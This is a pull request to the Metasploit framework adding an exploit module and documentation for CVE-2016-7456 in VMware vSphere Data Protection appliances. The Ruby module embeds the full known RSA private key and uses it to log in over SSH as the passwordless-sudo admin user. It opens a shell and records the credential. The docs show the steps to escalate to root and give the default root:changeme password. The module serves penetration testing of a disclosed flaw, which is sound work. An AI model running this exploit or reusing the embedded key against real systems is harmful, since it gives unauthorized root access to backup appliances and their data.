### PR TITLE
Exploit for VMware VDP with known ssh private key (CVE-2016-7456)

### DIFF
--- a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md
+++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md
@@ -25,3 +25,7 @@ msf exploit(vmware_vdp_known_privkey) > run
 [*] Found shell.  
 [*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100  
 ```
+
+## Further Information
+
+The default account of the appliance is root:changeme

--- a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md
+++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md
@@ -1,0 +1,27 @@
+## Vulnerable Application
+
+  VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: `use exploit/linux/ssh/vmware_vdp_known_privkey`
+  3. Do: `set rhost 1.2.3.4`
+  4. Do: `exploit`
+  5. You should get a shell.
+  6. Type: `sudo -s` to become root user
+
+## Scenarios
+
+This is a run against a known vulnerable vSphere Data Protection appliance.  
+  
+```
+msf > use exploit/linux/ssh/vmware_vdp_known_privkey  
+msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4  
+rhost => 1.2.3.4  
+msf exploit(exagrid_known_privkey) > run  
+  
+[+] Successful login  
+[*] Found shell.  
+[*] Command shell session 1 opened (1.2.3.5:34147 -> 1.2.3.4:22) at 2017-01-20 20:43:22 +0100  
+```

--- a/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md
+++ b/documentation/modules/exploit/linux/ssh/vmware_vdp_known_privkey.md
@@ -19,7 +19,7 @@ This is a run against a known vulnerable vSphere Data Protection appliance.
 msf > use exploit/linux/ssh/vmware_vdp_known_privkey  
 msf exploit(vmware_vdp_known_privkey) > set rhost 1.2.3.4  
 rhost => 1.2.3.4  
-msf exploit(exagrid_known_privkey) > run  
+msf exploit(vmware_vdp_known_privkey) > run  
   
 [+] Successful login  
 [*] Found shell.  

--- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
@@ -1,0 +1,167 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info = {})
+    super(update_info(info, {
+      'Name'        => 'VMware VDP known SSH Key',
+      'Description' => %q{
+        VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
+      },
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Privileged'  => true,
+      'Targets'     => [ [ "Universal", {} ] ],
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'Author'      => ['phroxvs'],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2016-7456' ], 
+		  [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
+        ],
+      'DisclosureDate' => "Dec 20 2016",
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+      'DefaultTarget' => 0
+    }))
+
+    register_options(
+      [
+        # Since we don't include Tcp, we have to register this manually
+        Opt::RHOST(),
+        Opt::RPORT(22)
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+
+  end
+
+  # helper methods that normally come from Tcp
+  def rhost
+    datastore['RHOST']
+  end
+  def rport
+    datastore['RPORT']
+  end
+
+  def do_login()
+    factory = Rex::Socket::SSHFactory.new(framework,self, datastore['Proxies'])
+    opt_hash = {
+      auth_methods:    ['publickey'],
+      port:            rport,
+      key_data:        [ key_data ],
+      use_agent:       false,
+      config:          false,
+      proxy:           factory,
+      non_interactive: true
+    }
+    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+    begin
+      ssh_socket = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh_socket = Net::SSH.start(rhost, 'admin', opt_hash)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh_socket
+
+      # Create a new session from the socket, then dump it.
+      conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
+      self.sockets.delete(ssh_socket.transport.socket)
+
+      return conn
+    else
+      return false
+    end
+  end
+
+  def exploit
+    conn = do_login()
+    if conn
+      print_good "Successful login"
+	  
+	  service_data = {
+        address: rhost,
+        port: rport,
+        protocol: 'tcp',
+        service_name: 'ssh',
+        workspace_id: myworkspace_id,
+      }
+      credential_data = {
+        username: 'admin',
+        private_type: :ssh_key,
+        private_data: key_data,
+        origin_type: :service,
+        module_fullname: fullname,
+      }.merge(service_data)
+
+      core = create_credential(credential_data)
+      login_data = {
+        core: core,
+        last_attempted: Time.now,
+      }.merge(service_data)
+
+      create_credential_login(login_data)
+	  
+      handler(conn.lsock)
+    end
+  end
+
+  def key_data
+    <<EOF
+-----BEGIN RSA PRIVATE KEY-----
+MIICWQIBAAKBgQCx/XgSpdlvoy1fABui75RYQFTRGPdkHBolTNIAeA91aPfnAr2X
+/PuZR/DiHMCYcn6/8A5Jn75YOD3OL0mumJJR1uQ4pyhY+MSptiMYxhvDLIiRRo16
+9jewWCSH/7jqWH8NhImpVxt5SjWtKhQInTdPkG1dCj8oSn87bt8fKvLcVQIBIwKB
+gFuJq3dN+suzAWQOryCYeC1i6cqfICTbQKV39vjtScdajh8IuUbZ4Hq3SK7M9VW3
+Od8NvjR+Ch691qSNWRf2saWS5MHiaYGF3xWwZokbJWJWmxlQ+Di9QAyRkjDIuMCR
+Sj/vvCa6kWzZlSZWOyNbs38XkWoKXqVYwtnyXrINpZJTAkEA2p0ZrCKQTWBKt7aT
+Rvx/8xnoYu9hSXIG1k11ql0HZdRpmveuZe64Gl6oJtgBZMXNdvAds+gvGTVCSfBO
+c2ne0wJBANBt3t84oicWJpkzXnUBPOZdheKfAK6QO7weXiRmbILTJ5drPdu8pmxR
+c1uQJgYitaSNKglJmz2WNOoaPZz/7zcCQBj8Au8Z5Jsg8pinJsZIvippXGMUCx5W
+LKrHBiIZQqyNTeXTKd/DgsEvY6yq+NhRHsvDq5+IP+Wfr83vk+/u16MCQE1qozz3
+xzMW2yL10qB8zXoivLNCX1bH26xFyzIXaiH2qE4vJZrCabM0MilSzEtr+lMP3GnZ
+gs27cr1aNCRfD7UCQHOXGagsD/ijMGNcWPBQOY3foHzxozoBLGmysAmVz3vX6uyr
+Y7oq9O5vDxwpMOAZ9JYTFuzEoWWg16L6SnNVYU4=
+-----END RSA PRIVATE KEY-----
+EOF
+    end
+end
+
+

--- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info, {
-      'Name'        => 'VMware VDP known SSH Key',
+      'Name'        => 'VMware VDP Known SSH Key',
       'Description' => %q{
         VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin who is a sudoer without password.
       },
@@ -34,8 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'CVE', '2016-7456' ], 
-		  [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
+          [ 'CVE', '2016-7456' ],
+          [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2016-0024.html' ],
         ],
       'DisclosureDate' => "Dec 20 2016",
       'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
@@ -115,8 +115,7 @@ class MetasploitModule < Msf::Exploit::Remote
     conn = do_login()
     if conn
       print_good "Successful login"
-	  
-	  service_data = {
+        service_data = {
         address: rhost,
         port: rport,
         protocol: 'tcp',
@@ -138,7 +137,6 @@ class MetasploitModule < Msf::Exploit::Remote
       }.merge(service_data)
 
       create_credential_login(login_data)
-	  
       handler(conn.lsock)
     end
   end

--- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
+++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb
@@ -5,12 +5,13 @@
 
 require 'msf/core'
 require 'net/ssh'
-
+require 'net/ssh/command_stream'
 
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Auxiliary::Report
+  include Msf::Auxiliary::CommandShell
   include Msf::Exploit::Remote::SSH
 
   def initialize(info = {})


### PR DESCRIPTION
VMware vSphere Data Protection appliances 5.5.x through 6.1.x contain a known ssh private key for the local user admin. This exploit includes the private key and gets you a shell if the ssh port of the appliance is reachable.

Reference: https://www.vmware.com/security/advisories/VMSA-2016-0024.html



## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/linux/ssh/vmware_vdp_known_privkey`
- [x] `set rhost <ip>`
- [x] `exploit`
- [x] Verify you get a shell

## Screenshot
![screenshot_vmware_vdp_known_privkey](https://cloud.githubusercontent.com/assets/6481444/21812788/6937ce4a-d754-11e6-91dd-91610ad537d7.png)
